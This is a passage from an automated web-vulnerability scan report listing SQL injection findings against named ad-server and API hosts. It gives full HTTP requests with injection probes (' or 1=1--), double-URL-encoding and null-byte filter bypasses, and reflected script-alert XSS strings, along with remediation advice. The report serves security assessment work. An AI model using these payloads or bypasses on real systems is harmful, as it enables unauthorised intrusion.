
25.58. http://tracker.u-link.me/ut_.js

25.59. http://video.od.visiblemeasures.com/log

25.60. http://widget.newsinc.com/ndn_toppicks.html

25.61. http://www.delish.com/api_static/twitter.json

25.62. http://www.donatemydress.org/

25.63. http://www.metrix4media.com/

25.64. http://www.metrix4media.com/solutions.html

25.65. http://www.misquincemag.com/misquincepp-quinceanera-2009-mis-quince-insert

25.66. http://www.networkadvertising.org/managing/opt_out.asp

25.67. http://www.networkadvertising.org/managing/optout_results.asp

25.68. http://www.quickandsimple.com/pp-qas-2011-9-7

25.69. http://www.realage.com/glossary.json

25.70. http://www.realage.com/promo-player-homepage-2011-03-25

25.71. http://www.seventeen.com/api_static/twitter.json

25.72. http://www.thedailygreen.com/api_static/twitter.json

25.73. http://www.thedailygreen.com/homezipfeed/

25.74. http://www.thedailygreen.com/promo-homepage-110916

25.75. http://www.tribalfusion.com/test/opt.js

25.76. http://www.ugo.com/takeover/takeover.html

25.77. http://www.ugo.com/xd_receiver.htm

26. Content type incorrectly stated

26.1. http://a.rad.msn.com/ADSAdClient31.dll

26.2. http://a1.interclick.com/getInPageJS.aspx

26.3. http://a1.interclick.com/getInPageJSProcess.aspx

26.4. http://ad.doubleclick.net/pfadx/seventeen_cim/

26.5. http://adserver.teracent.net/tase/ad

26.6. http://amch.questionmarket.com/adscgen/d_layer.php

26.7. http://amch.questionmarket.com/adscgen/dynamiclink.js.php

26.8. http://amch.questionmarket.com/adscgen/st.php

26.9. http://api.uproxx.com/ulink/feed

26.10. http://api.uproxx.com/ulink/template.js

26.11. http://api.zap2it.com/tvlistings/zcConnector.jsp

26.12. http://b.rad.msn.com/ADSAdClient31.dll

26.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs

26.14. http://content.pulse360.com/535BB4CE-7CD8-11E0-8B1F-79D9E4064C68

26.15. http://ellegirl.elle.com/wp-content/themes/thesis/custom/images/hearst-logo.png

26.16. http://event.adxpose.com/event.flow

26.17. http://events.seattlepi.com/partner_json/search

26.18. http://events.stamfordadvocate.com/partner_json/search

26.19. http://flesler-plugins.googlecode.com/files/jquery.localscroll-1.2.7-min.js

26.20. http://goku.brightcove.com/1pix.gif

26.21. http://hearst.com/flash/slideshow-home.xml

26.22. http://hearst.com/flash/slideshow-newspapers.xml

26.23. http://hfm.checkm8.com/adam/detect

26.24. http://html5form.googlecode.com/svn/trunk/jquery.html5form-min.js

26.25. http://o.aolcdn.com/os_merge/

26.26. http://ps2.newsinc.com/Playlist/show/90009/1709/507.xml

26.27. http://ps2.newsinc.com/players/GetZoneID/90009.xml

26.28. http://r.skimresources.com/api/

26.29. http://rad.msn.com/ADSAdClient31.dll

26.30. http://seattlepi.ux.hearstdigitalnews.com/favicon.ico

26.31. http://sensor2.suitesmart.com/sensor4.js

26.32. http://stamfordadvocate.ux.hearstdigitalnews.com/favicon.ico

26.33. http://thumbnail.newsinc.com/23529630.sf.jpg

26.34. http://tracker.u-link.me/ut_.js

26.35. http://ua.uproxxcdn.com/CXBetoHkoRG7G0E.png

26.36. http://ua.uproxxcdn.com/DZ2iEV7OFqoJUqT.png

26.37. http://ua.uproxxcdn.com/FKOcJyHi3WPtNW3.png

26.38. http://ua.uproxxcdn.com/RagyhhqntMN7eO5.png

26.39. http://ua.uproxxcdn.com/WiYUAs3s08PJENf.png

26.40. http://ua.uproxxcdn.com/r63wMetmtJgpwY8.jpg

26.41. http://video.od.visiblemeasures.com/log

26.42. http://vms.msn.com/vms.aspx

26.43. http://www.delish.com/api_static/twitter.json

26.44. http://www.delish.com/delish-network-tout.json

26.45. http://www.delish.com/promo-player-homepage-2011-9-15

26.46. http://www.facebook.com/extern/login_status.php

26.47. http://www.kampyle.com/favicon.ico

26.48. http://www.local.com/skins/default/images/locm_transhadow_v001.jpg

26.49. http://www.meebo.com/mcmd/events

26.50. http://www.meebo.com/mcmd/subscribe

26.51. http://www.misquincemag.com/misquincepp-quinceanera-2009-mis-quince-insert

26.52. http://www.quickandsimple.com/pp-qas-2011-9-7

26.53. http://www.realage.com/glossary.json

26.54. http://www.realage.com/promo-player-homepage-2011-03-25

26.55. http://www.seattlepi.com/mediaManager/

26.56. http://www.seventeen.com/api_static/twitter.json

26.57. http://www.stamfordadvocatedailydeals.com/favicon.ico

26.58. http://www.stamfordadvocatedailydeals.com/widgets/a

26.59. http://www.thedailygreen.com/api_static/twitter.json

26.60. http://www.thedailygreen.com/promo-homepage-110916

26.61. http://www.tribalfusion.com/test/opt.js

27. Content type is not specified

27.1. http://208.111.153.35/open/1

27.2. http://ad.technoratimedia.com/st

27.3. http://pcm1.map.pulsemgr.com/uds/pc

27.4. http://www.meebo.com/cmd/btproviders

27.5. http://www.meebo.com/cmd/tc

27.6. http://www.meebo.com/mcmd/start



1. SQL injection  next
There are 40 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ad.doubleclick.net/adj/DY146/ron_lifestyle [sz parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/DY146/ron_lifestyle

Issue detail

The sz parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sz parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the sz request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /adj/DY146/ron_lifestyle;sz=300x250;ord=2310888?%2527 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.misquincemag.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 3564
Set-Cookie: id=c2102423c000027||t=1316277512|et=730|cs=002213fd48cb8966602b2a269f; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:38:32 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:38:32 GMT
Date: Sat, 17 Sep 2011 16:38:31 GMT
Expires: Sat, 17 Sep 2011 16:38:31 GMT
Cache-Control: private

document.write('<IFRAME SRC=\"http://ad.doubleclick.net/adi/N5019.284127.DBGVIDEONETWORK/B5621714;sz=1x1;pc=[TPAS_ID];click=;ord=4397376?\" WIDTH=1 HEIGHT=1 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPAC
...[SNIP]...
033469%3B4307-300/250%3B42867329/42885116/1%3B%3B%7Esscs%3D%3fhttp://www.eyewonderlabs.com/ct2.cfm?ewbust=0&guid=0&ewadid=147002&eid=1465331&file=http://cdn.eyewonder.com/100125/769319/1465331/NOSCRIPTfailover.jpg&pnl=MainBanner&type=0&name=Clickthru-NOSCRIPT&num=1&time=0&diff=0&clkX=&clkY=&click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/w%3B246333486%3B0-0%3B0%3B46033469%3B4307-300/250%3B42
...[SNIP]...

Request 2

GET /adj/DY146/ron_lifestyle;sz=300x250;ord=2310888?%2527%2527 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.misquincemag.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1712
Set-Cookie: id=cd801423c0000f8||t=1316277513|et=730|cs=002213fd485921263baaebd341; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:38:33 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:38:33 GMT
Date: Sat, 17 Sep 2011 16:38:33 GMT
Expires: Sat, 17 Sep 2011 16:38:33 GMT
Cache-Control: private

document.write('<IFRAME SRC=\"http://ad.doubleclick.net/adi/N5019.284127.DBGVIDEONETWORK/B5621714.2;sz=300x250;pc=[TPAS_ID];click0=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/p%3B246333480%3
...[SNIP]...

1.2. http://ad.doubleclick.net/adj/hdm.quicksimple/other/ [id cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/hdm.quicksimple/other/

Issue detail

The id cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adj/hdm.quicksimple/other/;sz=728x90,1000x124;tile=1;pos=1;site=quicksimple;sect=index;sub=index;subsub=index;page=homepage;cat=other;subcat=;tool=ros;artid=;kw=;a=;b=;mtfIFPath=/cm/shared/admeld/;game=;ord=2083708371501416? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.quickandsimple.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT%00'

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7122
Set-Cookie: id=c6bf8413c00006d||t=1316277322|et=730|cs=002213fd4847ac9fe262429b03; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:35:22 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:35:22 GMT
Date: Sat, 17 Sep 2011 16:35:22 GMT
Expires: Sat, 17 Sep 2011 16:35:22 GMT
Cache-Control: private

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Sep 01 13:12:40 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /adj/hdm.quicksimple/other/;sz=728x90,1000x124;tile=1;pos=1;site=quicksimple;sect=index;sub=index;subsub=index;page=homepage;cat=other;subcat=;tool=ros;artid=;kw=;a=;b=;mtfIFPath=/cm/shared/admeld/;game=;ord=2083708371501416? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.quickandsimple.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT%00''

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 278
Set-Cookie: id=c7bf8413c0000a6||t=1316277323|et=730|cs=002213fd4830959e95967a6e6c; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:35:23 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:35:23 GMT
Date: Sat, 17 Sep 2011 16:35:23 GMT
Expires: Sat, 17 Sep 2011 16:35:23 GMT
Cache-Control: private

document.write('');

admeld_publisher = 303;
admeld_site = 'hearst_us';
admeld_size = '728x90';
admeld_placement = 'quickandsimple_us';

document.write('\n<script type=\"text/javascript
...[SNIP]...

1.3. http://api.uproxx.com/ulink/feed [c_cats parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://api.uproxx.com
Path:   /ulink/feed

Issue detail

The c_cats parameter appears to be vulnerable to SQL injection attacks. The payloads 16216981'%20or%201%3d1--%20 and 16216981'%20or%201%3d2--%20 were each submitted in the c_cats parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ulink/feed?pid=163&limit=12&c_cats=3,15,17,16216981'%20or%201%3d1--%20&uw_nsfw=false&format=json HTTP/1.1
Host: api.uproxx.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=e21911b30cf3ed12536b7b3e176e20ab

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:34:49 GMT
Server: Apache
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4563

UPROXXJSON(
[{"category":"Web Culture","content_title":"UPROXX Interview With Charlie Day","image_url":"http:\/\/ua.uproxxcdn.com\/6PxEor9uKEjF6Lm.jpg","content_clicks":"10999","source_title":"Uproxx"
...[SNIP]...
e_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=www.camelclutchblog.com","content_link":"http:\/\/widget.uproxx.com\/t\/1u106377o163"},{"category":"Geek\/Sci-Fi\/Gaming News","content_title":"Black Ops Freak Out!","image_url":"http:\/\/ua.uproxxcdn.com\/5i4Q0VYMyo7fr8O.jpg","content_clicks":"3195","source_title":"Chru Dat","source_url":"http:\/\/www.chrudat.com","source_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=www.chrudat.com","content_link":"http:\/\/widget.uproxx.com\/t\/1u106685o163"},{"category":"Geek\/Sci-Fi\/Gaming News","content_title":"Anime Expo 2011 Video Game Cosplay","image_url":"http:\/\/ua.uproxxcdn.com\/WYgN5RE569G2Jjs.png","content_clicks":"29353","source_title":"G4TV","source_url":"http:\/\/g4tv.com\/","source_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=g4tv.com","content_link":"http:\/\/widget.uproxx.com\/t\/1a101711o163"},{"category":"Web Culture","content_title":"The 15 Best Singing Performances In Non-musical Fi","image_url":"http:\/\/ua.uproxxcdn.com\/idlhYruu5wciG76.jpg","content_clicks":"11","source_title":"BuzzFeed","source_url":"http:\/\/www.buzzfeed.com","source_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=www.buzzfeed.com","content_link":"http:\/\/widget.uproxx.com\/t\/1r107997o163"},{"category":"Geek\/Sci-Fi\/Gaming News","content_title":"Internet Browsers As Pretty Ladies","image_url":"http:\/\/ua.uproxxcdn.com\/XNo3uSJmW62dTv1.jpg","content_clicks":"190","source_title":"NextRound","source_url":"http:\/\/nextround.net","source_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=nextround.net","content_link":"http:\/\/widget.uproxx.com\/t\/1r107802o163"},{"category":"Geek\/Sci-Fi\/Gaming News","content_title":"Oh, Tom Brady: Your Pretty Mouth Was Never Meant F","image_url":"http:\/\/ua.uproxxcdn.com\/XLGjl6SZe8fykLv.jpg","content_clicks":"45","source_title":"Pajiba","source_url":"http:\/\/www.pajiba.com","source_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=www.pajiba.com","content_link":"http:\/\/widget.uproxx.com\/t\/1r107973o163"},{"category":"Web Culture","content_title":"The 50 Most Entertaining Sh**ty Movies","image_url":"http:\/\/ua.uproxxcdn.com\/CXBetoHkoRG7G0E.png","con
...[SNIP]...

Request 2

GET /ulink/feed?pid=163&limit=12&c_cats=3,15,17,16216981'%20or%201%3d2--%20&uw_nsfw=false&format=json HTTP/1.1
Host: api.uproxx.com
Proxy-Connection: keep-alive
Referer: http://www.ugo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=e21911b30cf3ed12536b7b3e176e20ab

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:34:49 GMT
Server: Apache
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4548

UPROXXJSON(
[{"category":"Web Culture","content_title":"UPROXX Interview With Charlie Day","image_url":"http:\/\/ua.uproxxcdn.com\/6PxEor9uKEjF6Lm.jpg","content_clicks":"10999","source_title":"Uproxx"
...[SNIP]...
e_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=www.camelclutchblog.com","content_link":"http:\/\/widget.uproxx.com\/t\/1u106377o163"},{"category":"Geek\/Sci-Fi\/Gaming News","content_title":"Pokeball Bras Are A Thing","image_url":"http:\/\/ua.uproxxcdn.com\/4ppTtVOloDM8xzC.jpg","content_clicks":"98100","source_title":"Chru Dat","source_url":"http:\/\/www.chrudat.com","source_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=www.chrudat.com","content_link":"http:\/\/widget.uproxx.com\/t\/1u101223o163"},{"category":"Geek\/Sci-Fi\/Gaming News","content_title":"Awesome Attack of the Show Wonder Woman Cosplay","image_url":"http:\/\/ua.uproxxcdn.com\/XVkDdOxfJroEaBO.png","content_clicks":"7441","source_title":"G4TV","source_url":"http:\/\/g4tv.com\/","source_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=g4tv.com","content_link":"http:\/\/widget.uproxx.com\/t\/1u103599o163"},{"category":"Web Culture","content_title":"25 Inane Zooeyisms","image_url":"http:\/\/ua.uproxxcdn.com\/r63wMetmtJgpwY8.jpg","content_clicks":"2397","source_title":"BuzzFeed","source_url":"http:\/\/www.buzzfeed.com","source_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=www.buzzfeed.com","content_link":"http:\/\/widget.uproxx.com\/t\/1a106792o163"},{"category":"Web Culture","content_title":"Photoshop: You Know What to Do","image_url":"http:\/\/ua.uproxxcdn.com\/n1gKAfQZb9Flva6.png","content_clicks":"20690","source_title":"NextRound","source_url":"http:\/\/nextround.net","source_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=nextround.net","content_link":"http:\/\/widget.uproxx.com\/t\/1u105974o163"},{"category":"Geek\/Sci-Fi\/Gaming News","content_title":"Let's Pour Some Out For The Stars Who Never Were","image_url":"http:\/\/ua.uproxxcdn.com\/3Ob3olsyCseRJwE.jpg","content_clicks":"3231","source_title":"Pajiba","source_url":"http:\/\/www.pajiba.com","source_favicon":"http:\/\/www.google.com\/s2\/favicons?domain=www.pajiba.com","content_link":"http:\/\/widget.uproxx.com\/t\/1r104591o163"},{"category":"Geek\/Sci-Fi\/Gaming News","content_title":"Marisa Miller Gets R.I.P.D.","image_url":"http:\/\/ua.uproxxcdn.com\/kkkLAbmhiJFVLSE.png","content_clicks":"12363","sou
...[SNIP]...

1.4. http://hfm.checkm8.com/adam/detect [&LOC parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://hfm.checkm8.com
Path:   /adam/detect

Issue detail

The &LOC parameter appears to be vulnerable to SQL injection attacks. The payloads 18653300'%20or%201%3d1--%20 and 18653300'%20or%201%3d2--%20 were each submitted in the &LOC parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=35152207082137465&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=118653300'%20or%201%3d1--%20&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=759729630779475&req=fr&& HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110917162454,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1316276692; A=dqR5Y9wlTKRLv9UJ7MTba; C=oqR5Y9wCJH5ScaabaSI0P3Xb

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:50:38 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.13 NY-AD3
Set-cookie: A=dqR5Y9wSL3KUv9UJ7MTba;Path=/;
Set-cookie: C=okL6Y9wbG5Y1caaJaSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:23:58 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 156333621/1230474426/2850622218/2591229859
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

Request 2

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=35152207082137465&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=118653300'%20or%201%3d2--%20&WIDTH=1087&HEIGHT=870&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=759729630779475&req=fr&& HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110917162454,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1316276692; A=dqR5Y9wlTKRLv9UJ7MTba; C=oqR5Y9wCJH5ScaabaSI0P3Xb

Response 2

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:50:38 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.13 NY-AD3
Set-cookie: C=okL6Y9wbG5Y1caaKaSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:23:58 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.checkm8.com
x-internal-id: 156333621/1230474426/2850622218/2591229859
x-internal-selected:
x-internal-error: NO VALID CATEGORY NAME
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 3
Connection: close
Content-Type: application/javascript

...

1.5. http://hfm.checkm8.com/adam/detect [HEIGHT parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://hfm.checkm8.com
Path:   /adam/detect

Issue detail

The HEIGHT parameter appears to be vulnerable to SQL injection attacks. The payloads 21414440%20or%201%3d1--%20 and 21414440%20or%201%3d2--%20 were each submitted in the HEIGHT parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adam/detect?cat=hfmus.eg.hp.landingpage&page=35152207082137465&serial=1000:1:A&&LOC=http://ellegirl.elle.com/\qb1903\p3C/script\p3E\p3Cscript\p3Ealert(document.location)\p3C/script\p3E43727dda065=1&WIDTH=1087&HEIGHT=87021414440%20or%201%3d1--%20&WIDTH_RANGE=WR_D&DATE=01110917&HOUR=16&RES=RS21&ORD=759729630779475&req=fr&& HTTP/1.1
Host: hfm.checkm8.com
Proxy-Connection: keep-alive
Referer: http://ellegirl.elle.com/?b1903%3C/script%3E%3Cscript%3Ealert(document.location)%3C/script%3E43727dda065=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: dt=97,20110917162454,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1316276692; A=dqR5Y9wlTKRLv9UJ7MTba; C=oqR5Y9wCJH5ScaabaSI0P3Xb

Response 1

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 16:50:45 GMT
Server: Apache
P3P: policyref="http://hfm.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.212.12 NY-AD2
Set-cookie: A=dqR5Y9wCJ38Sv9UJ7MTba;Path=/;
Set-cookie: C=orL6Y9wx3NQ0caabbSI0P3Xb;Path=/;Expires=Fri, 01-Feb-2075 20:24:04 GMT;
x-internal-browser: CH0
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;
Set-Cookie: cm8dccp=;Path=/;Expires=Mon, 12-Jan-1970 13:46:40 GMT;Domain=.hfm.checkm8.com
